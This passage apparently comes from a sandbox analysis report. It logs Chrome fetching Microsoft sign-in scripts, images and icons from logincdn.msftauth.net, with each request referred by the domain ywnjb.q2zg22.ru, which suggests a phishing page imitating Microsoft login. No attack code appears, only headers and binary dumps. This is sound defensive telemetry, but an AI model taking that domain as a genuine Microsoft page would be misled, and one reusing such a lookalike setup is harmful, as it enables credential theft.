                                                                                                                          Data Ascii: moh3*1VYqsQ)mJ"coU,G][&-rZZA>q<'_isedGoJE{|ryWnvf|Z"R"]@|-%L&F=a:\JwKRrj)wl!@]7mzNh_4}vz.DMnGH9i
                                                                                                                          2024-02-02 19:17:59 UTC12691INData Raw: 05 12 73 65 5f 43 ee b5 a6 0a 6e 83 08 03 ba f6 3a d7 c1 f5 6c 76 ab 4e 60 47 68 19 58 60 f5 1f 5e bb c3 54 de 2e 80 82 4f c9 76 ef a4 d4 b5 72 0a ee 68 55 55 91 83 40 67 5f dc f5 4a 1c f6 94 3e 3d 7d 79 a0 3e 39 55 07 e7 28 38 b8 38 65 d6 f5 5b 91 70 12 1c 69 47 2b 47 a6 a3 95 0e 6d 81 13 58 fc 26 42 bf 8e 1d ad 38 fe 3e ed 53 99 91 95 ee 68 64 66 52 9b 89 03 08 8d 1b 82 51 74 a5 1c f1 3a ed 15 45 74 3b 29 5e 35 bb d6 fb fa 7a db 7a 27 1a 93 ee 23 3d 44 bf 15 6d ad 43 c0 d2 64 91 ac 81 29 f3 92 ec 05 5f 59 d7 da da 65 be a6 3f da b7 38 0a be 24 da e8 8d 01 b8 41 ae b4 0b ff d2 ba a5 24 85 d5 3e 9e 97 b0 f2 d1 73 cf a0 45 b4 57 a1 27 69 f7 9e 79 d0 2d 71 2f 29 4f 51 86 ce 20 a4 8e 6f 80 45 9c a5 63 47 7c 28 33 2f 2a 99 bd c0 49 d2 0d 4e f3 57 e8 09 fe a7
                                                                                                                          Data Ascii: se_Cn:lvN`GhX`^T.OvrhUU@g_J>=}y>9U(88e[piG+GmX&B8>ShdfRQt:Et;)^5zz'#=DmCd)_Ye?8$A$>sEW'iy-q/)OQ oEcG|(3/*INW


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          68192.168.2.164980213.107.213.414435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:59 UTC601OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_ppassword_b2365db90edea8b1b8b1.js HTTP/1.1
                                                                                                                          Host: logincdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://ywnjb.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:18:00 UTC790INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:59 GMT
                                                                                                                          Content-Type: application/x-javascript
                                                                                                                          Content-Length: 7273
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Last-Modified: Thu, 04 Jan 2024 05:03:54 GMT
                                                                                                                          ETag: 0x8DC0CE28D1E58FC
                                                                                                                          x-ms-request-id: da3cec78-f01e-0038-165f-554e73000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          x-azure-ref: 20240202T191759Z-rr5bh4r6wd46p4muzzky0vh7f40000000590000000008cy6
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-02-02 19:18:00 UTC7273INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 5d 7b 77 db 36 b2 ff 7f 3f 05 ad dd e3 90 b7 30 63 3b 6d b6 a5 cb fa d8 b2 9d b8 f5 43 6b 29 c9 36 8f a3 43 91 90 c4 98 22 18 12 b2 ac da fa ee 77 06 e0 9b a0 2d a7 ed de de 7b ae 7a 2a 99 20 30 18 0c 66 06 bf 19 80 cc f3 ff da f8 9b f6 5f da d6 fa 1f ad 3f 38 b8 1a 68 97 27 da e0 f5 e9 d5 91 d6 83 ab 5f b5 8b cb c1 69 f7 78 7d 3a d8 29 fe 3f 98 fa 89 36 f6 03 aa c1 ef c8 49 a8 a7 b1 50 63 b1 e6 87 2e 8b 23 16 3b 9c 26 da 0c be 63 df 09 b4 71 cc 66 1a 9f 52 2d 8a d9 67 ea f2 44 0b fc 84 43 a3 11 0d d8 42 d3 81 5c ec 69 3d 27 e6 4b ed b4 67 98 40 9f 02 35 7f e2 87 d0 da 65 d1 12 fe 9e 72 2d 64 dc 77 a9 e6 84 9e a0 16 c0 45 98 50 6d 1e 7a 34 d6 16 53 df 9d 6a e7 be 1b b3 84 8d b9 16 53 97 fa 37 d0 49 32 87 f2 6a 17 44 73 62
                                                                                                                          Data Ascii: ]{w6?0c;mCk)6C"w-{z* 0f_?8h'_ix}:)?6IPc.#;&cqfR-gDCB\i='Kg@5er-dwEPmz4SjS7I2jDsb


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          69192.168.2.164980313.107.213.414435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:59 UTC662OUTGET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1
                                                                                                                          Host: logincdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://ywnjb.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:18:00 UTC734INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:00 GMT
                                                                                                                          Content-Type: image/gif
                                                                                                                          Content-Length: 2672
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:22:50 GMT
                                                                                                                          ETag: 0x8DB5C40D3D59111
                                                                                                                          x-ms-request-id: 15ac3aec-701e-0048-173e-51bc73000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          x-azure-ref: 20240202T191800Z-ecymkpg23112b33df8zpd4u0xn000000084000000000d5hh
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-02-02 19:18:00 UTC2672INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e 69 18 14 00 21
                                                                                                                          Data Ascii: GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~i!


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          70192.168.2.164980413.107.213.414435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:59 UTC656OUTGET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1
                                                                                                                          Host: logincdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://ywnjb.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:18:00 UTC734INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:00 GMT
                                                                                                                          Content-Type: image/gif
                                                                                                                          Content-Length: 3620
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:22:50 GMT
                                                                                                                          ETag: 0x8DB5C40D3BB06B9
                                                                                                                          x-ms-request-id: 703fd349-301e-009c-0fd7-55241d000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          x-azure-ref: 20240202T191800Z-thedy76qyx6tt2g3kt33xt6mhc00000008fg00000000eh8e
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-02-02 19:18:00 UTC3620INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 0f
                                                                                                                          Data Ascii: GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`9


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          71192.168.2.164980513.107.213.414435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:00 UTC614OUTGET /16.000.30091.10/images/favicon.ico HTTP/1.1
                                                                                                                          Host: logincdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://ywnjb.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:18:00 UTC738INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:00 GMT
                                                                                                                          Content-Type: image/x-icon
                                                                                                                          Content-Length: 17174
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Last-Modified: Fri, 26 Jan 2024 01:34:16 GMT
                                                                                                                          ETag: 0x8DC1E0EE8F30E67
                                                                                                                          x-ms-request-id: 35ba27f3-e01e-0049-251b-539771000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          x-azure-ref: 20240202T191800Z-bnqy097bgt2xhbgb4merub2dvg00000005800000000005k0
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-02-02 19:18:00 UTC15646INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                                                                                          Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                                                                                          2024-02-02 19:18:00 UTC1528INData Raw: 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22
                                                                                                                          Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          72192.168.2.164980613.107.213.414435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:00 UTC656OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                                                                          Host: logincdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://ywnjb.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:18:00 UTC778INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:00 GMT
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Content-Length: 673
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:22:46 GMT
                                                                                                                          ETag: 0x8DB5C40D14F1C27
                                                                                                                          x-ms-request-id: aa48ceb2-701e-0074-4475-53697b000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          x-azure-ref: 20240202T191800Z-2bd6hsuvqx5ghb6yrraa118nf400000007rg000000008t8g
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-02-02 19:18:00 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                                                                                          Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          73192.168.2.164980713.107.213.414435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:00 UTC657OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                                                                          Host: logincdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://ywnjb.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:18:00 UTC779INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:00 GMT
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Content-Length: 1435
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:22:50 GMT
                                                                                                                          ETag: 0x8DB5C40D3A66EC0
                                                                                                                          x-ms-request-id: 81e05eb7-d01e-0042-2bfa-51b266000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          x-azure-ref: 20240202T191800Z-s9rt41xvpd2158uhu922qnyp7g00000003p000000000f2v0
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-02-02 19:18:00 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                                                                                          Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          74192.168.2.164980913.107.246.414435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:00 UTC427OUTGET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1
                                                                                                                          Host: logincdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:18:00 UTC734INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:00 GMT
                                                                                                                          Content-Type: image/gif
                                                                                                                          Content-Length: 2672
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:22:50 GMT
                                                                                                                          ETag: 0x8DB5C40D3D59111
                                                                                                                          x-ms-request-id: 15ac3aec-701e-0048-173e-51bc73000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          x-azure-ref: 20240202T191800Z-k8wskgpt8h4qd31424cf3nhvhc00000000gg00000000dysu
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-02-02 19:18:00 UTC2672INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e 69 18 14 00 21
                                                                                                                          Data Ascii: GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~i!


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
